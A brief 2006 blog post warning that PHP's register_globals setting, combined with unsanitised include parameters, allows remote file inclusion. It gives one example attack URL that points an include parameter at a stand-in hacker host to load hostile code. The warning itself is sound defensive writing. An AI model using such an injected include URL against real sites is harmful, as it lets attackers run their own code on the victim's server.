Home > PHP, Security > register_globals = on; suicidal

register_globals = on; suicidal

August 7th, 2006 Leave a comment Go to comments

Yes, unless care is taken while coding. Imagine register globals is on and a include uses a variable from the user submission or from coded in urls like page.php?v=mod/login.php, well this can be manually rewritten to page.php?v=http://any.hacker.site/php_hacktool/hacktool.txt, which will eventually force php to include the remote hostile code into your code.. and provide a method for cunning, hackers to check, inspect or even alter the content.

Check Point Software

  1. No comments yet.
  1. No trackbacks yet.

four + five =